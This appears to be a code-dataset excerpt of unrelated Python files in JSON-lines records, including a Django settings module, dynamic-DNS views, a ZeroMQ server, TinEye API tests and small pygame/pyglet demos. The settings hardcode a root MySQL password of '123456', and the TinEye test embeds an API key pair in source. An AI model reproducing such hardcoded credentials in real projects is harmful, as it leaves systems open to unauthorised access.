len(licheng) > 0:\n guazi[\"licheng\"] = licheng[0]\n guazi[\"url\"] = response.url\n yield guazi\n\n\n","sub_path":"Scrapyt/myproject/myproject/spiders/guazicrawl.py","file_name":"guazicrawl.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"645165419","text":"import argparse\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n#import cv2\nimport skimage.io\nimport skimage.draw\nfrom skimage.transform import resize\nimport chainer\nfrom chainer import serializers\n\n\nimport ssd_net\n\nlabelmap = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car',\n 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike',\n 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']\n\nparser = argparse.ArgumentParser(\n description='Learning convnet from ILSVRC2012 dataset')\nparser.add_argument('path', help='Path to training image-label list file')\nargs = parser.parse_args()\nmean = np.array([104,117,123])\nimage = skimage.img_as_float(skimage.io.imread(args.path, as_grey=False)).astype(np.float32)\n\nimg = resize(image, (300,300))\nimg = img*255 - mean[::-1]\nimg = img.transpose(2, 0, 1)[::-1]\n\nmodel = ssd_net.SSD()\nserializers.load_npz(\"ssd.model\", model)\nx = chainer.Variable(np.array([img],dtype=np.float32))\nmodel(x,1)\na=model.detection()\nplt.imshow(image)\ncurrentAxis = plt.gca()\ncolors = plt.cm.hsv(np.linspace(0, 1, 21)).tolist()\nfor i in a:\n label, conf, x1, y1, x2, y2 = i\n label = int(label) -1\n x1 = int(round(x1 * image.shape[1]))\n x2 = int(round(x2 * image.shape[1]))\n y1 = int(round(y1 * image.shape[0]))\n y2 = int(round(y2 * image.shape[0]))\n label_name = labelmap[int(label)]\n display_txt = '%s: %.2f'%(label_name, conf)\n coords = (x1, y1), x2-x1+1, y2-y1+1\n color = colors[int(label)]\n currentAxis.add_patch(plt.Rectangle(*coords, fill=False, edgecolor=color, linewidth=2))\n currentAxis.text(x1, y1, display_txt, bbox={'facecolor':color, 'alpha':0.5})\nplt.show()\n","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"622866379","text":"#-*- coding:utf-8 -*-\n\nfrom .settings_common import *\n\n# django 容器(如 gunicorn, cherrypy) web服务地址\nWEB_SERVER_LISTEN_ADDR = ('0.0.0.0',8000)\n\n\n\nDEBUG=True\n\n#一、sqlite3 数据库\n\"\"\"\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\"\"\"\n#二、mysql数据库\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'plesson',\n 'USER': 'root',\n 'PASSWORD': '123456',\n 'HOST': '127.0.0.1',\n 'PORT': '3306',\n 'CONN_MAX_AGE': 0, # 最长连接时间不能太长,否则多个worker的时候,有的worker可能获取不到DB连接\n 'OPTIONS': {\n # \"init_command\": \"SET storage_engine=INNODB\",\n }\n }\n }\n\n\n\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'LOCATION': 'unique-snowflake',\n 'TIMEOUT': 30*60, # 30 minutes cache will be deleted\n 'OPTIONS': {\n 'MAX_ENTRIES': 1000 # not effective for memcached\n }\n },\n\n 'onedaycache': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'LOCATION': 'unique-snowflake2',\n 'TIMEOUT': 86400,\n 'OPTIONS': {\n 'MAX_ENTRIES': 1000\n }\n }\n}\n\n# FATAL = CRITICAL = 50 ERROR = 40 WARN = WARNING = 30 INFO = 20 DEBUG = 10 NOTSET = 0\nLOG_LEVEL = 'INFO'\n\ndjango_sys_log_setting = {\n 'handlers': ['django_file','console'],\n 'level': LOG_LEVEL,\n 'propagate': False,\n }\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse',\n },\n 'require_debug_true': {\n '()': 'django.utils.log.RequireDebugTrue',\n },\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(asctime)s %(message)s',\n 'datefmt': '%m%d_%H:%M:%S'\n },\n 'simple': {\n 'format': '%(message)s'\n },\n },\n 'handlers': {\n 'null': {\n 'class': 'logging.NullHandler',\n },\n 'console': {\n 'level': LOG_LEVEL,\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple'\n },\n 'django_file': {\n 'level': LOG_LEVEL,\n 'class': 'logging.handlers.RotatingFileHandler',#'logging.FileHandler',\n 'filename': BASE_DIR + '/log/django.log',\n 'maxBytes' : 1024*1024*10, # 10MB\n 'backupCount' : 50,\n 'formatter': 'verbose'\n },\n 'mgr_file': {\n 'level': LOG_LEVEL,\n 'class': 'logging.handlers.RotatingFileHandler',#'logging.FileHandler',\n 'filename': BASE_DIR + '/log/mgr.log',\n 'maxBytes' : 1024*1024*10, # 10MB\n 'backupCount' : 50,\n 'formatter': 'verbose'\n },\n\n 'teacher_file': {\n 'level': LOG_LEVEL,\n 'class': 'logging.handlers.RotatingFileHandler',#'logging.FileHandler',\n 'filename': BASE_DIR + '/log/teacher.log',\n 'maxBytes' : 1024*1024*10, # 10MB\n 'backupCount' : 50,\n 'formatter': 'verbose'\n },\n\n 'student_file': {\n 'level': LOG_LEVEL,\n 'class': 'logging.handlers.RotatingFileHandler',#'logging.FileHandler',\n 'filename': BASE_DIR + '/log/student.log',\n 'maxBytes' : 1024*1024*10, # 10MB\n 'backupCount' : 50,\n 'formatter': 'verbose'\n },\n 'datamodel_file': {\n 'level': LOG_LEVEL,\n 'class': 'logging.handlers.RotatingFileHandler',#'logging.FileHandler',\n 'filename': BASE_DIR + '/log/model.log',\n 'maxBytes' : 1024*1024*10, # 10MB\n 'backupCount' : 50,\n 'formatter': 'verbose'\n },\n 'stats_file': {\n 'level': LOG_LEVEL,\n 'class': 'logging.handlers.RotatingFileHandler',#'logging.FileHandler',\n 'filename': BASE_DIR + '/log/stats.log',\n 'maxBytes' : 1024*1024*10, # 10MB\n 'backupCount' : 50,\n 'formatter': 'verbose'\n },\n 'sms_file': {\n 'level': LOG_LEVEL,\n 'class': 'logging.handlers.RotatingFileHandler',#'logging.FileHandler',\n 'filename': BASE_DIR + '/log/sms.log',\n 'maxBytes' : 1024*1024*10, # 10MB\n 'backupCount' : 50,\n 'formatter': 'verbose'\n },\n 'util_file': {\n 'level': LOG_LEVEL,\n 'class': 'logging.handlers.RotatingFileHandler',#'logging.FileHandler',\n 'filename': BASE_DIR + '/log/util.log',\n 'maxBytes' : 1024*1024*10, # 10MB\n 'backupCount' : 20,\n 'formatter': 'verbose'\n },\n },\n\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'level': LOG_LEVEL,\n },\n 'django.request': django_sys_log_setting,\n 'django.security': django_sys_log_setting,\n 'py.warnings': django_sys_log_setting,\n 'django.db.backends': django_sys_log_setting,\n\n 'mgr': {\n 'handlers': ['mgr_file','console'],\n 'level': LOG_LEVEL,\n },\n\n 'teacher': {\n 'handlers': ['teacher_file','console'],\n 'level': LOG_LEVEL,\n },\n\n 'student': {\n 'handlers': ['student_file','console'],\n 'level': LOG_LEVEL,\n },\n\n 'datamodel': {\n 'handlers': ['datamodel_file','console'],\n 'level': LOG_LEVEL,\n },\n\n 'stats': {\n 'handlers': ['stats_file'],\n 'level': LOG_LEVEL,\n },\n 'sms': {\n 'handlers': ['sms_file','console'],\n 'level': LOG_LEVEL,\n },\n 'util': {\n 'handlers': ['util_file'],\n 'level': LOG_LEVEL,\n },\n }\n}","sub_path":"restapi-teach/backend/project/settings-mysql.py","file_name":"settings-mysql.py","file_ext":"py","file_size_in_byte":6063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"63655837","text":"import time\nimport hashlib\nfrom django.http import Http404\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.shortcuts import get_object_or_404\nfrom django.utils.timezone import now\nfrom zencore.django.request import get_client_ip\nfrom .models import Host\nfrom .utils import get_update_code\nfrom .utils import get_query_code\n\n\ndef update(request):\n hostname = request.GET.get(\"hostname\", \"\").upper()\n ip = request.GET.get(\"ip\", \"\")\n timestamp = request.GET.get(\"timestamp\", \"\")\n code = request.GET.get(\"code\", \"\")\n client_ip = get_client_ip(request)\n\n if (not hostname) or (not code) or (not timestamp):\n raise Http404()\n\n if abs(time.time() - int(timestamp)) > 60:\n raise Http404()\n\n host = get_object_or_404(Host, hostname=hostname)\n real_code = get_update_code(hostname, ip, timestamp, host.update_key)\n if code != real_code:\n raise Http404()\n\n host.ip = ip or client_ip\n host.update_time = now()\n host.save()\n\n return HttpResponse(\"OK\")\n\n\ndef query(request):\n hostname = request.GET.get(\"hostname\", \"\").upper()\n timestamp = request.GET.get(\"timestamp\", \"\")\n code = request.GET.get(\"code\", \"\")\n\n if (not hostname) or (not timestamp) or (not code):\n raise Http404()\n\n if abs(time.time() - int(timestamp)) > 60:\n raise Http404()\n\n host = get_object_or_404(Host, hostname=hostname)\n real_code = get_query_code(hostname, timestamp, host.update_key)\n if real_code != code:\n raise Http404()\n\n return HttpResponse(str(host.ip))\n","sub_path":"src/hostnamed/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"369350495","text":"import zmq\n\nclass Server(object):\n \"\"\"\n Will start a server that runs functions on request\n \"\"\"\n def __init__(self, url=\"127.0.0.1\", port=\"5000\"):\n # initiate\n self._context = zmq.Context()\n self.url = url\n self.port = port\n self.functions = {}\n\n def add_function(self, name, function):\n self.functions[name] = function\n\n def _exec_function(self, msg):\n \"\"\"\n msg = data object that came with message,\n should consist of:\n {\n \"id\": UniqueID,\n \"function\": \"functionkey\",\n \"args\": [],\n \"kwargs\": {},\n }\n \"\"\"\n try:\n f = self.functions[msg['function']]\n except KeyError:\n return {\n \"ID\": msg['ID'],\n 'result': None,\n 'error': 'function does not exist'\n }\n result = f(*msg['args'], **msg['kwargs'])\n\n return {\n \"ID\": msg[\"ID\"],\n \"result\": result,\n \"error\": None,\n }\n\n def _loop(self, socket):\n while 1:\n msg = socket.recv_json()\n result = self._exec_function(msg)\n socket.send_json(result)\n \n def run(self):\n \"\"\"\n runs loop,\n wraps to close socket when error\n \"\"\"\n socket = self._context.socket(zmq.PAIR)\n socket.bind(\"tcp://{url}:{port}\".format(\n url= self.url,\n port = self.port,\n )\n )\n try:\n self._loop(socket)\n except:\n socket.close()\n raise\n \n","sub_path":"zero/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"48921071","text":"import os\nfrom random import randint as rnd\n\ndef get(l, r):\n\treturn rnd(1, 10**10) % (r - l + 1) + l\n\ndef gen():\n\tf = open(\"input.txt\", \"w\")\n\tn = rnd(2, 5)\n\tm = rnd(2, 5)\n\tprint(n, m, file = f)\n\tfor i in range(n):\n\t\tfor j in range(m):\n\t\t\tprint(get(0, 1), end = \" \", file = f)\n\t\tprint(end = \"\\n\", file = f)\n\ndef main():\n\tfor te in range(10**6):\n\t\tgen()\n\n\t\tos.system(\"./good < input.txt > output.txt\")\n\t\tcorrect = open(\"output.txt\", \"r\").readline()\n\t\t\n\t\tos.system(\"./bad < input.txt > output.txt\")\n\t\tincorrect = open(\"output.txt\", \"r\").readline()\n\n\t\tif (incorrect != correct and (incorrect == \"-1\" or correct == \"-1\")):\n\t\t\tprint(\"WA\", te)\n\t\t\tprint(open(\"input.txt\", \"r\").read())\n\t\t\tprint(\"correct = \")\n\t\t\tprint(correct)\n\t\t\tprint(\"incorrect = \")\n\t\t\tprint(incorrect)\n\t\t\tbreak\n\t\tprint(\"OK\", te)\n\n\nmain()","sub_path":"2019/CF/71/stress.py","file_name":"stress.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"395769751","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_api_request.py\n\nTest TinEyeAPIRequest class.\n\nCopyright (c) 2015 Idée Inc. All rights reserved worldwide.\n\"\"\"\n\nfrom datetime import datetime\nimport unittest\n\nfrom pytineye.api import Backlink, Match, TinEyeResponse\nfrom pytineye.api import TinEyeAPIRequest\n\n\nclass TestTinEyeAPIRequest(unittest.TestCase):\n \"\"\" Test TinEyeAPIRequest class. \"\"\"\n\n def setUp(self):\n self.api = TinEyeAPIRequest(\n api_url='https://api.tineye.com/rest/',\n public_key='LCkn,2K7osVwkX95K4Oy',\n private_key='6mm60lsCNIB,FwOWjJqA80QZHh9BMwc-ber4u=t^')\n\n def tearDown(self):\n pass\n\n def test_backlink(self):\n \"\"\" Test TinEyeAPI.Backlink object. \"\"\"\n\n backlink = {'url': 'url', 'crawl_date': '2010-02-19', 'backlink': 'backlink'}\n b = Backlink._from_dict(backlink)\n self.assertEquals(\n repr(b),\n 'Backlink(url=\"url\", backlink=backlink, crawl_date=2010-02-19 00:00:00)')\n self.assertEquals(b.url, 'url')\n self.assertEquals(b.crawl_date, datetime(2010, 2, 19, 0, 0))\n self.assertEquals(b.backlink, 'backlink')\n\n backlink = {'url': 'url', 'crawl_date': '', 'backlink': 'backlink'}\n b = Backlink._from_dict(backlink)\n self.assertEquals(b.url, 'url')\n self.assertEquals(b.crawl_date, datetime(1, 1, 1, 0, 0))\n self.assertEquals(b.backlink, 'backlink')\n\n backlink = {'url': '', 'crawl_date': '', 'backlink': ''}\n b = Backlink._from_dict(backlink)\n self.assertEquals(b.url, '')\n self.assertEquals(b.crawl_date, datetime(1, 1, 1, 0, 0))\n self.assertEquals(b.backlink, '')\n\n backlink = {'url': None, 'crawl_date': None, 'backlink': None}\n b = Backlink._from_dict(backlink)\n self.assertEquals(b.url, None)\n self.assertEquals(b.crawl_date, datetime(1, 1, 1, 0, 0))\n self.assertEquals(b.backlink, None)\n\n def test_match(self):\n \"\"\" Test TinEyeAPI.Match object. \"\"\"\n\n match = {\n 'backlinks': [{'url': 'url', 'crawl_date': '2008-04-27', 'backlink': 'backlink'}],\n 'format': 'JPEG', 'overlay': 'overlay', 'height': 297, 'width': 350,\n 'image_url': 'image_url', 'filesize': 87918, 'contributor': False,\n 'size': 103950, 'query_hash': 'dca08fc6b2ec4b9e04f94a4e29223f6af3dd6555'}\n m = Match._from_dict(match)\n self.assertEquals(repr(m), 'Match(image_url=\"image_url\", width=350, height=297)')\n self.assertEquals(len(m.backlinks), 1)\n self.assertEquals(m.format, 'JPEG')\n self.assertEquals(m.overlay, 'overlay')\n self.assertEquals(m.height, 297)\n self.assertEquals(m.width, 350)\n self.assertEquals(m.image_url, 'image_url')\n self.assertEquals(m.filesize, 87918)\n self.assertEquals(m.contributor, False)\n self.assertEquals(m.size, 103950)\n\n match = {\n 'backlinks': [\n {'url': 'url', 'crawl_date': '2008-04-27', 'backlink': 'backlink'},\n {'url': 'url', 'crawl_date': '2009-04-27', 'backlink': 'backlink'}],\n 'format': 'JPEG', 'overlay': 'overlay', 'height': 297, 'width': 350,\n 'image_url': 'image_url', 'filesize': 87918, 'contributor': True,\n 'size': 103950}\n m = Match._from_dict(match)\n self.assertEquals(len(m.backlinks), 2)\n self.assertEquals(m.format, 'JPEG')\n self.assertEquals(m.overlay, 'overlay')\n self.assertEquals(m.height, 297)\n self.assertEquals(m.width, 350)\n self.assertEquals(m.image_url, 'image_url')\n self.assertEquals(m.filesize, 87918)\n self.assertEquals(m.contributor, True)\n self.assertEquals(m.size, 103950)\n\n match = {\n 'backlinks': [],\n 'format': '', 'overlay': '',\n 'image_url': 'image_url', 'filesize': 87918, 'contributor': True,\n 'size': 103950}\n m = Match._from_dict(match)\n self.assertEquals(len(m.backlinks), 0)\n self.assertEquals(m.format, '')\n self.assertEquals(m.overlay, '')\n self.assertEquals(m.height, None)\n self.assertEquals(m.width, None)\n self.assertEquals(m.image_url, 'image_url')\n self.assertEquals(m.filesize, 87918)\n self.assertEquals(m.contributor, True)\n self.assertEquals(m.size, 103950)\n\n def test_tineye_response(self):\n \"\"\" Test TinEyeAPI.TinEyeResponse object. \"\"\"\n\n matches = {\n 'results': {\n 'matches': [\n {\n 'backlinks': [],\n 'format': '',\n 'overlay': '',\n 'height': 297,\n 'width': 350,\n 'image_url': '',\n 'filesize': 87918,\n 'contributor': True,\n 'size': 103950\n }\n ]\n }\n }\n r = TinEyeResponse._from_dict(matches)\n self.assertEquals(\n repr(r),\n 'TinEyeResponse(matches=\"[Match(image_url=\"\", width=350, height=297)]\", total_results=0)'),\n self.assertEquals(len(r.matches), 1)\n self.assertEquals(r.matches[0].height, 297)\n self.assertEquals(r.matches[0].width, 350)\n\n matches = {\n 'results': {\n 'matches': [\n {\n 'backlinks': [],\n 'format': '',\n 'overlay': '',\n 'height': 297,\n 'width': 350,\n 'image_url': '',\n 'filesize': 87918,\n 'contributor': True,\n 'size': 103950\n },\n {\n 'backlinks': [],\n 'format': '',\n 'overlay': '',\n 'height': 200,\n 'width': 300,\n 'image_url': '',\n 'filesize': 87918,\n 'contributor': True,\n 'size': 103950\n }\n ]\n }\n }\n r = TinEyeResponse._from_dict(matches)\n self.assertEquals(len(r.matches), 2)\n self.assertEquals(r.matches[1].height, 200)\n self.assertEquals(r.matches[1].width, 300)\n\n matches = {'results': {'matches': []}}\n r = TinEyeResponse._from_dict(matches)\n self.assertEquals(len(r.matches), 0)\n\n def test_calls(self):\n \"\"\" Test methods with API sandbox. \"\"\"\n\n # Test search_url with sandbox\n response = self.api.search_url('http://www.tineye.com/images/meloncat.jpg')\n self.assertEqual(len(response.matches), 100)\n self.assertTrue(response.total_results > 1000)\n\n response = self.api.search_url('http://www.tineye.com/images/meloncat.jpg', limit=10)\n self.assertEqual(len(response.matches), 10)\n self.assertTrue(response.total_results > 1000)\n\n # Test search_data with sandbox\n filename = \"test/images/meloncat.jpg\"\n data = \"\"\n with open(filename, 'rb') as fp:\n data = fp.read()\n response = self.api.search_data(data)\n self.assertEqual(len(response.matches), 100)\n self.assertTrue(response.total_results > 1000)\n\n response = self.api.search_data(data, limit=10)\n self.assertEqual(len(response.matches), 10)\n self.assertTrue(response.total_results > 1000)\n\n # Test remaining_searches with sandbox\n remaining_searches = self.api.remaining_searches()\n self.assertEqual(remaining_searches['remaining_searches'], 5000)\n self.assertTrue('start_date' in remaining_searches)\n self.assertTrue('expire_date' in remaining_searches)\n self.assertTrue(isinstance(remaining_searches['start_date'], datetime))\n self.assertTrue(isinstance(remaining_searches['expire_date'], datetime))\n\n # Test image_count with sandbox\n image_count = self.api.image_count()\n self.assertTrue(image_count > 10000000000)\n\n def test_total_results_in_response(self):\n \"\"\" Test if TinEyeAPI.TinEyeResponse contains total_results. \"\"\"\n\n response = {\n 'results': {'total_results': 123, 'matches': []}\n }\n r = TinEyeResponse._from_dict(response)\n self.assertEqual(r.total_results, 123)\n","sub_path":"test/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"117721883","text":"class Solution(object):\r\n def addBinary(self, a, b):\r\n \"\"\"\r\n :type a: str\r\n :type b: str\r\n :rtype: str\r\n \"\"\"\r\n if a == \"\" or b == \"\":\r\n return \"\"\r\n \r\n int_a = self.toInt(a)\r\n int_b = self.toInt(b)\r\n return bin(int_a + int_b)[2:]\r\n \r\n def toInt(self, binary):\r\n decimal = 0\r\n for i in binary:\r\n decimal = decimal * 2 + int(i)\r\n return decimal\r\n \r\n##################################################\r\n\"\"\"\r\nhttps://leetcode.com/discuss/47330/one-line-python-solution\r\n\"\"\"\r\nclass Solution(object):\r\n def addBinary(self, a, b):\r\n return bin(int(a,2) + int(b,2))[2:]\r\n # or: bin(eval('0b'+a+'+0b'+b))[2:]","sub_path":"src/067_AddBinary.py","file_name":"067_AddBinary.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"517085872","text":"import numpy as np\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\n\nclass MyDataLoader(DataLoader):\n def __init__(self, dataset, batch_size, shuffle, num_workers, validation_split=0.0, validation_idx=None):\n self.validation_split = validation_split\n self.validation_idx = validation_idx\n self.shuffle = shuffle\n self.n_samples = len(dataset)\n self.sampler, self.valid_sampler = self._split_sampler(self.validation_split, self.validation_idx)\n\n self.init_kwargs = {\n 'dataset': dataset,\n 'batch_size': batch_size,\n 'shuffle': self.shuffle,\n 'num_workers': num_workers\n }\n super(MyDataLoader, self).__init__(sampler=self.sampler, **self.init_kwargs)\n\n def _split_sampler(self, validation_split, validation_idx):\n if (validation_split == 0.0) and (validation_idx is None):\n return None, None\n\n idx_full = np.arange(self.n_samples)\n if validation_idx is None:\n np.random.seed(0)\n np.random.shuffle(idx_full)\n\n len_valid = int(self.n_samples * validation_split)\n\n valid_idx = idx_full[0:len_valid]\n train_idx = np.delete(idx_full, np.arange(0, len_valid))\n else:\n # if validation_idx is provided, validation_split is ignored\n valid_idx = validation_idx\n train_idx = np.delete(idx_full, valid_idx)\n\n train_sampler = SubsetRandomSampler(train_idx)\n valid_sampler = SubsetRandomSampler(valid_idx)\n\n # turn off shuffle option which is mutually exclusive with sampler\n self.shuffle = False\n self.n_samples = len(train_idx)\n\n return train_sampler, valid_sampler\n\n def split_validation(self):\n if self.valid_sampler is None:\n return None\n else:\n print(\"Number of training data: %d\" % len(self.sampler.indices))\n print(\"Number of validation data: %d\" % len(self.valid_sampler.indices))\n return DataLoader(sampler=self.valid_sampler, **self.init_kwargs)\n","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"108888262","text":"_base_ = [\n '../_base_/models/vit-base-p16.py',\n '../_base_/datasets/imagenet_bs64_pil_resize.py',\n '../_base_/schedules/imagenet_bs4096_AdamW.py',\n '../_base_/default_runtime.py'\n]\n\n# model setting\nmodel = dict(backbone=dict(pre_norm=True))\n\n# data settings\ntrain_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(\n type='RandomResizedCrop',\n scale=448,\n backend='pillow',\n interpolation='bicubic'),\n dict(type='RandomFlip', prob=0.5, direction='horizontal'),\n dict(type='PackInputs'),\n]\n\ntest_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(\n type='ResizeEdge',\n scale=448,\n edge='short',\n backend='pillow',\n interpolation='bicubic'),\n dict(type='CenterCrop', crop_size=448),\n dict(type='PackInputs'),\n]\n\ntrain_dataloader = dict(dataset=dict(pipeline=train_pipeline))\nval_dataloader = dict(dataset=dict(pipeline=test_pipeline))\ntest_dataloader = dict(dataset=dict(pipeline=test_pipeline))\n\n# schedule setting\noptim_wrapper = dict(clip_grad=dict(max_norm=1.0))\n","sub_path":"configs/clip/vit-base-p16_pt-64xb64_in1k-448px.py","file_name":"vit-base-p16_pt-64xb64_in1k-448px.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"558246741","text":"from math import *\nfrom pyglet.gl import *\nimport random\nimport time\n\n#count = 0\n#t0 = 0\n#t1 = 0\n#t2 = 0\n#t3 = 0\n\nCIRCLES = 500\nNUM_POINTS = 40\n\ncos_value = [cos(radians(float(i)/NUM_POINTS * 360)) for i in range(NUM_POINTS)]\nsin_value = [sin(radians(float(i)/NUM_POINTS * 360)) for i in range(NUM_POINTS)]\n\nclass Circle():\n\n def __init__(self, center_x, center_y, radius, color, batch):\n # first get all verteces of the circle\n self.center = (center_x, center_y)\n self.radius = radius\n vertices = self._pos_vertices()\n self.num_verts = len(vertices) // 2\n colors = self._color_vertices(color)\n self.vertex_list = batch.add(self.num_verts, pyglet.gl.GL_TRIANGLE_STRIP, None,\n ('v2f', vertices),\n ('c3B', colors))\n\n def _pos_vertices(self):\n #global t2, t3\n x = (self.radius*cos_value[i] + self.center[0] for i in range(NUM_POINTS))\n y = (self.radius*sin_value[i] + self.center[1] for i in range(NUM_POINTS))\n #t22 = time.time()\n circle_verts = list(zip(x,y))\n #t2 += time.time() - t22\n #t33 = time.time()\n verts = list()\n verts.extend(2 * (self.center[0], self.center[1]))\n for v1, v2 in zip(circle_verts[0:-1:2], circle_verts[1::2]):\n verts += v1\n verts += v2\n verts += (self.center[0], self.center[1])\n verts.extend(2 * circle_verts[0])\n #t3 += time.time() - t33\n return verts\n\n def _color_vertices(self, color):\n colors = self.num_verts * color\n return colors\n\n def set_position(self, x, y):\n #global t0, t1\n #t00 = time.time()\n self.center = (x, y)\n new_verts = self._pos_vertices()\n #t0 += time.time() - t00\n #t11 = time.time()\n self.vertex_list.vertices = new_verts\n #t1 += time.time() - t11\n\n def delete(self):\n self.vertex_list.delete()\n\n\nif __name__ == \"__main__\":\n\n window = pyglet.window.Window(800, 600)\n batch = pyglet.graphics.Batch()\n\n def makeCircles(number, center_x, center_y, radius, batch):\n color = (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))\n circles = []\n for i in range(number):\n circles.append(Circle(random.randint(0,800), random.randint(0,600), radius, color, batch))\n return circles\n\n circles = makeCircles(CIRCLES, random.randint(0,800), random.randint(0,600), 20, batch)\n\n @window.event\n def on_draw():\n glClear(pyglet.gl.GL_COLOR_BUFFER_BIT)\n batch.draw()\n\n #GL_TRIANGLE_STRIP global count, t0, t1, t2, t3\n #count += 1\n #if count % 10 == 0:\n # print('------------------------------------')\n # print(\"CALC \", t0)\n # print(\"ADD VERT\", t1)\n # print(\"VERT 1 \", t2)\n # print(\"VERT 2 \", t3)\n # t0 = 0\n # t1 = 0\n # t2 = 0\n # t3 = 0\n fps_display.draw()\n\n fps_display = pyglet.clock.ClockDisplay()\n\n def update(dt):\n for circle in circles:\n circle.set_position(random.randint(0,800), random.randint(0,600))\n\n pyglet.clock.schedule_interval(update, 0.01)\n\n pyglet.app.run()\n","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"432755077","text":"import pygame\nfrom pygame.locals import *\nfrom sys import exit\nimport random\n\n\nbranco = (255, 255, 255)\nxr = 1200\nyr = random.randint(0, 200)\nxr2 = 1600\nyr2 = random.randint(0, 200)\nxr3 = 2000\nyr3 = random.randint(0, 200) \n\nbackground_image_filename = 'img/Noite.png' \ncorrendo_image_filename = 'img/Correndo.png' \npulando_image_filename = 'img/Pulando.png' \ninimigo1_image_filename = 'img/Inimigo1.png' \ninimigo2_image_filename = 'img/Inimigo2.png' \nbala_image_filename = 'img/Bala.png' \n\n\n\npygame.init()\n\nscreen = pygame.display.set_mode((800, 380), 0, 32)\nclock = pygame.time.Clock()\nbackground = pygame.image.load(background_image_filename).convert()\nbackground2 = pygame.image.load(background_image_filename).convert()\ncorrendo = pygame.image.load(correndo_image_filename).convert()\npulando = pygame.image.load(pulando_image_filename).convert()\ninimigo1 = pygame.image.load(inimigo1_image_filename).convert()\ninimigo2 = pygame.image.load(inimigo2_image_filename).convert()\nbala1 = pygame.image.load(bala_image_filename).convert()\nbala2 = pygame.image.load(bala_image_filename).convert()\npersonagem = correndo\n\n\nbx = 0\nbx2 = 801\nx = 0\ny = 325\nxi1 = 710\nxi2 = 710\nyi1 = 100\nyi2 = y\nxb1 = 700\nxb2 = 700\nyb1 = yi1\nyb2 = yi2\nsubir = 0\nz = 0\na = 4\n\nwhile True:\n\n for event in pygame.event.get(): \n if event.type == QUIT:\n pygame.quit()\n exit()\n\n if event.type == KEYDOWN and subir == 0:\n if event.key==K_SPACE:\n subir = 1\n personagem = pulando\n \n\n\n if subir == 1:\n y -= 10\n z += 1\n\n if z == 25:\n subir = 2\n\n if subir == 2:\n y += 10\n z -= 1\n\n if z == 0:\n subir = 0\n personagem = correndo \n \n\n if bx < -800:\n bx = 800\n\n if bx2 < -800:\n bx2 = 800\n\n if xr < - 200:\n xr = 1000\n yr = random.randint(0, 300)\n\n if xr2 < - 200:\n xr2 = 1000\n yr2 = random.randint(0, 300)\n\n if xr3 < - 200:\n xr3 = 1000\n yr3 = random.randint(0, 300)\n\n if yi1 < 0:\n a = a * (-1)\n\n if yi1 > 300:\n a = a * (-1)\n\n if xb1 < -150:\n xb1 = 700\n yb1 = yi1 + 10 \n\n if xb2 < -150:\n xb2 = 700\n yb2 = yi2 + 10\n \n\n\n line_rect = Rect(xr,yr, 200, 50)\n line_rect2 = Rect(xr2,yr2, 200, 50)\n line_rect3 = Rect(xr3,yr3, 200, 50) \n xr -= 5\n xr2 -= 5\n xr3 -= 5\n bx -= 5\n bx2 -= 5\n yi1 += a\n yi2 = y - 30\n xb1 -= 4\n xb2 -= 4\n clock.tick(60)\n screen.blit(background, (bx,0))\n screen.blit(background2, (bx2,0))\n screen.blit(personagem, (x,y))\n screen.blit(bala1, (xb1,yb1))\n screen.blit(bala2, (xb2,yb2))\n screen.blit(inimigo1, (xi1,yi1))\n screen.blit(inimigo2, (xi2,yi2))\n\n\n\n pygame.draw.rect(screen, branco, line_rect)\n pygame.draw.rect(screen, branco, line_rect2)\n pygame.draw.rect(screen, branco, line_rect3)\n 